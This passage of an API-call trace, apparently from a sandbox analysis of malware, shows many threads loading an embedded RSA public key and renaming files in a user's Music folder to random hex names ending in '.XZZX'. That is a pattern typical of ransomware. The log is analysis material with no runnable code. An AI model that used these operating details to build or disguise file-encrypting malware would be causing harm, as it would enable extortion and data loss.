MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2aafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0183.775] wsprintfW (in: param_1=0x2aae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\030BD5C01239BCD075C7E63814E4A118.XZZX") returned 77 [0183.775] StrStrW (lpFirst="35A8A5603BE70712A81D33D040A3EB5A.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 670 os_tid = 0xc7c [0183.930] lstrcpyA (in: lpString1=0x2aafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0183.930] lstrcpyW (in: lpString1=0x2aaf460, lpString2="3DAB40862FBD462437E5810B348A2A6C.XZZX" | out: lpString1="3DAB40862FBD462437E5810B348A2A6C.XZZX") returned="3DAB40862FBD462437E5810B348A2A6C.XZZX" [0183.931] lstrcpyW (in: lpString1=0x2aae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0183.931] SetErrorMode (uMode=0x1) returned 0x1 [0183.931] lstrcpyW (in: lpString1=0x2aaf860, lpString2="3DAB40862FBD462437E5810B348A2A6C.XZZX" | out: lpString1="3DAB40862FBD462437E5810B348A2A6C.XZZX") returned="3DAB40862FBD462437E5810B348A2A6C.XZZX" [0183.931] CoCreateGuid (in: pguid=0x2aae440 | out: pguid=0x2aae440*(Data1=0x8e29316b, Data2=0x34ad, Data3=0x4f42, Data4=([0]=0x96, [1]=0x93, [2]=0xed, [3]=0x7f, [4]=0xb3, [5]=0x9e, [6]=0x6f, [7]=0xfb))) returned 0x0 [0183.931] wsprintfW (in: param_1=0x2aaec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3DAB40862FBD462437E5810B348A2A6C.XZZX") returned 77 [0183.931] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2aafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0183.931] wsprintfW (in: param_1=0x2aae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\6FE0214F104EF79A8E29316B12F9DBE2.XZZX") returned 77 [0183.931] StrStrW (lpFirst="3DAB40862FBD462437E5810B348A2A6C.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 671 os_tid = 0xc80 [0184.086] lstrcpyA (in: lpString1=0x2aafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0184.086] lstrcpyW (in: lpString1=0x2aaf460, lpString2="5EF7279E2ED18E2582C79CC632E9726D.XZZX" | out: lpString1="5EF7279E2ED18E2582C79CC632E9726D.XZZX") returned="5EF7279E2ED18E2582C79CC632E9726D.XZZX" [0184.086] lstrcpyW (in: lpString1=0x2aae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0184.086] SetErrorMode (uMode=0x1) returned 0x1 [0184.086] lstrcpyW (in: lpString1=0x2aaf860, lpString2="5EF7279E2ED18E2582C79CC632E9726D.XZZX" | out: lpString1="5EF7279E2ED18E2582C79CC632E9726D.XZZX") returned="5EF7279E2ED18E2582C79CC632E9726D.XZZX" [0184.086] CoCreateGuid (in: pguid=0x2aae440 | out: pguid=0x2aae440*(Data1=0x99eb06b8, Data2=0x886f, Data3=0x4e44, Data4=([0]=0x9c, [1]=0xe2, [2]=0x97, [3]=0xdf, [4]=0xbb, [5]=0x4b, [6]=0x3a, [7]=0x9f))) returned 0x0 [0184.086] wsprintfW (in: param_1=0x2aaec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\5EF7279E2ED18E2582C79CC632E9726D.XZZX") returned 77 [0184.086] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2aafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0184.087] wsprintfW (in: param_1=0x2aae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\9879A9C829B60F7C99EB06B82C60F3C4.XZZX") returned 77 [0184.087] StrStrW (lpFirst="5EF7279E2ED18E2582C79CC632E9726D.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 672 os_tid = 0xc84 [0184.242] lstrcpyA (in: lpString1=0x2aafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0184.242] lstrcpyW (in: lpString1=0x2aaf460, lpString2="70CB960A1797B0A14EB31B321C2694E9.XZZX" | out: lpString1="70CB960A1797B0A14EB31B321C2694E9.XZZX") returned="70CB960A1797B0A14EB31B321C2694E9.XZZX" [0184.242] lstrcpyW (in: lpString1=0x2aae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0184.243] SetErrorMode (uMode=0x1) returned 0x1 [0184.243] lstrcpyW (in: lpString1=0x2aaf860, lpString2="70CB960A1797B0A14EB31B321C2694E9.XZZX" | out: lpString1="70CB960A1797B0A14EB31B321C2694E9.XZZX") returned="70CB960A1797B0A14EB31B321C2694E9.XZZX" [0184.243] CoCreateGuid (in: pguid=0x2aae440 | out: pguid=0x2aae440*(Data1=0x142b30c8, Data2=0x2ba8, Data3=0x4533, Data4=([0]=0x89, [1]=0x28, [2]=0x7e, [3]=0x5, [4]=0x14, [5]=0x8e, [6]=0x3b, [7]=0xd2))) returned 0x0 [0184.243] wsprintfW (in: param_1=0x2aaec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\70CB960A1797B0A14EB31B321C2694E9.XZZX") returned 77 [0184.243] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2aafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0184.243] wsprintfW (in: param_1=0x2aae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7D899B400BCCFA78142B30C80E77DEC0.XZZX") returned 77 [0184.243] StrStrW (lpFirst="70CB960A1797B0A14EB31B321C2694E9.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 673 os_tid = 0xc88 [0184.399] lstrcpyA (in: lpString1=0x2aafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0184.399] lstrcpyW (in: lpString1=0x2aaf460, lpString2="95567F6E0CF2434A8F3CB62A111F2792.XZZX" | out: lpString1="95567F6E0CF2434A8F3CB62A111F2792.XZZX") returned="95567F6E0CF2434A8F3CB62A111F2792.XZZX" [0184.399] lstrcpyW (in: lpString1=0x2aae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0184.399] SetErrorMode (uMode=0x1) returned 0x1 [0184.399] lstrcpyW (in: lpString1=0x2aaf860, lpString2="95567F6E0CF2434A8F3CB62A111F2792.XZZX" | out: lpString1="95567F6E0CF2434A8F3CB62A111F2792.XZZX") returned="95567F6E0CF2434A8F3CB62A111F2792.XZZX" [0184.399] CoCreateGuid (in: pguid=0x2aae440 | out: pguid=0x2aae440*(Data1=0xd998e98b, Data2=0xd32b, Data3=0x49f3, Data4=([0]=0x9a, [1]=0x45, [2]=0x0, [3]=0xcc, [4]=0x60, [5]=0xc0, [6]=0x9b, [7]=0x92))) returned 0x0 [0184.399] wsprintfW (in: param_1=0x2aaec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\95567F6E0CF2434A8F3CB62A111F2792.XZZX") returned 77 [0184.399] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2aafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0184.399] wsprintfW (in: param_1=0x2aae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\952CCB593CFFB4D1D998E98B3FAA9919.XZZX") returned 77 [0184.399] StrStrW (lpFirst="95567F6E0CF2434A8F3CB62A111F2792.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 674 os_tid = 0xc8c [0184.555] lstrcpyA (in: lpString1=0x2aafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0184.555] lstrcpyW (in: lpString1=0x2aaf460, lpString2="B169CAD546C877A0159FDF7F4B675BE8.XZZX" | out: lpString1="B169CAD546C877A0159FDF7F4B675BE8.XZZX") returned="B169CAD546C877A0159FDF7F4B675BE8.XZZX" [0184.555] lstrcpyW (in: lpString1=0x2aae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0184.555] SetErrorMode (uMode=0x1) returned 0x1 [0184.555] lstrcpyW (in: lpString1=0x2aaf860, lpString2="B169CAD546C877A0159FDF7F4B675BE8.XZZX" | out: lpString1="B169CAD546C877A0159FDF7F4B675BE8.XZZX") returned="B169CAD546C877A0159FDF7F4B675BE8.XZZX" [0184.555] CoCreateGuid (in: pguid=0x2aae440 | out: pguid=0x2aae440*(Data1=0x45ab84e0, Data2=0x69b7, Data3=0x41f8, Data4=([0]=0x9f, [1]=0xec, [2]=0xf4, [3]=0xad, [4]=0x25, [5]=0x69, [6]=0x41, [7]=0x26))) returned 0x0 [0184.555] wsprintfW (in: param_1=0x2aaec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\B169CAD546C877A0159FDF7F4B675BE8.XZZX") returned 77 [0184.555] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2aafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0184.555] wsprintfW (in: param_1=0x2aae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\271BDC201B3DE04845AB84E01DE8C490.XZZX") returned 77 [0184.556] StrStrW (lpFirst="B169CAD546C877A0159FDF7F4B675BE8.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 675 os_tid = 0xc90 [0184.711] lstrcpyA (in: lpString1=0x2aafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0184.711] lstrcpyW (in: lpString1=0x2aaf460, lpString2="C1C4370F268A7D85910C485D2AAB61CD.XZZX" | out: lpString1="C1C4370F268A7D85910C485D2AAB61CD.XZZX") returned="C1C4370F268A7D85910C485D2AAB61CD.XZZX" [0184.711] lstrcpyW (in: lpString1=0x2aae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0184.711] SetErrorMode (uMode=0x1) returned 0x1 [0184.711] lstrcpyW (in: lpString1=0x2aaf860, lpString2="C1C4370F268A7D85910C485D2AAB61CD.XZZX" | out: lpString1="C1C4370F268A7D85910C485D2AAB61CD.XZZX") returned="C1C4370F268A7D85910C485D2AAB61CD.XZZX" [0184.712] CoCreateGuid (in: pguid=0x2aae440 | out: pguid=0x2aae440*(Data1=0x24be8e6a, Data2=0xe8c2, Data3=0x426f, Data4=([0]=0x84, [1]=0xb2, [2]=0x13, [3]=0xd4, [4]=0x2d, [5]=0x65, [6]=0xd6, [7]=0x4))) returned 0x0 [0184.712] wsprintfW (in: param_1=0x2aaec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\C1C4370F268A7D85910C485D2AAB61CD.XZZX") returned 77 [0184.712] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2aafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0184.712] wsprintfW (in: param_1=0x2aae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\8977FC543C66F01E24BE8E6A3F11D466.XZZX") returned 77 [0184.712] StrStrW (lpFirst="C1C4370F268A7D85910C485D2AAB61CD.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 676 os_tid = 0xc94 [0184.867] lstrcpyA (in: lpString1=0x2aafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0184.867] lstrcpyW (in: lpString1=0x2aaf460, lpString2="D25EF7C41A27D9E43EBB395A1EBABE2C.XZZX" | out: lpString1="D25EF7C41A27D9E43EBB395A1EBABE2C.XZZX") returned="D25EF7C41A27D9E43EBB395A1EBABE2C.XZZX" [0184.867] lstrcpyW (in: lpString1=0x2aae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0184.867] SetErrorMode (uMode=0x1) returned 0x1 [0184.867] lstrcpyW (in: lpString1=0x2aaf860, lpString2="D25EF7C41A27D9E43EBB395A1EBABE2C.XZZX" | out: lpString1="D25EF7C41A27D9E43EBB395A1EBABE2C.XZZX") returned="D25EF7C41A27D9E43EBB395A1EBABE2C.XZZX" [0184.867] CoCreateGuid (in: pguid=0x2aae440 | out: pguid=0x2aae440*(Data1=0x8b4ae0b2, Data2=0x2c20, Data3=0x411a, Data4=([0]=0xbb, [1]=0x3e, [2]=0xba, [3]=0x8e, [4]=0xa, [5]=0x15, [6]=0x82, [7]=0xb6))) returned 0x0 [0184.867] wsprintfW (in: param_1=0x2aaec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\D25EF7C41A27D9E43EBB395A1EBABE2C.XZZX") returned 77 [0184.867] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2aafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0184.867] wsprintfW (in: param_1=0x2aae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\47FAAE400B389B408B4AE0B20DE37F88.XZZX") returned 77 [0184.867] StrStrW (lpFirst="D25EF7C41A27D9E43EBB395A1EBABE2C.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 677 os_tid = 0xc98 [0185.022] lstrcpyA (in: lpString1=0x2aafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0185.022] lstrcpyW (in: lpString1=0x2aaf460, lpString2="FAD3BB6308C4FC66694F337D0D31E0AE.XZZX" | out: lpString1="FAD3BB6308C4FC66694F337D0D31E0AE.XZZX") returned="FAD3BB6308C4FC66694F337D0D31E0AE.XZZX" [0185.023] lstrcpyW (in: lpString1=0x2aae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0185.023] SetErrorMode (uMode=0x1) returned 0x1 [0185.023] lstrcpyW (in: lpString1=0x2aaf860, lpString2="FAD3BB6308C4FC66694F337D0D31E0AE.XZZX" | out: lpString1="FAD3BB6308C4FC66694F337D0D31E0AE.XZZX") returned="FAD3BB6308C4FC66694F337D0D31E0AE.XZZX" [0185.023] CoCreateGuid (in: pguid=0x2aae440 | out: pguid=0x2aae440*(Data1=0x7157f514, Data2=0x4b8b, Data3=0x4d18, Data4=([0]=0x96, [1]=0xd6, [2]=0x13, [3]=0xce, [4]=0x3f, [5]=0xd0, [6]=0x3c, [7]=0x52))) returned 0x0 [0185.023] wsprintfW (in: param_1=0x2aaec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\FAD3BB6308C4FC66694F337D0D31E0AE.XZZX") returned 77 [0185.023] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2aafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0185.023] wsprintfW (in: param_1=0x2aae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4F8EEDDC16BFE4087157F514196AC850.XZZX") returned 77 [0185.023] StrStrW (lpFirst="FAD3BB6308C4FC66694F337D0D31E0AE.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 678 os_tid = 0xc9c [0185.178] lstrcpyA (in: lpString1=0x2aafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV 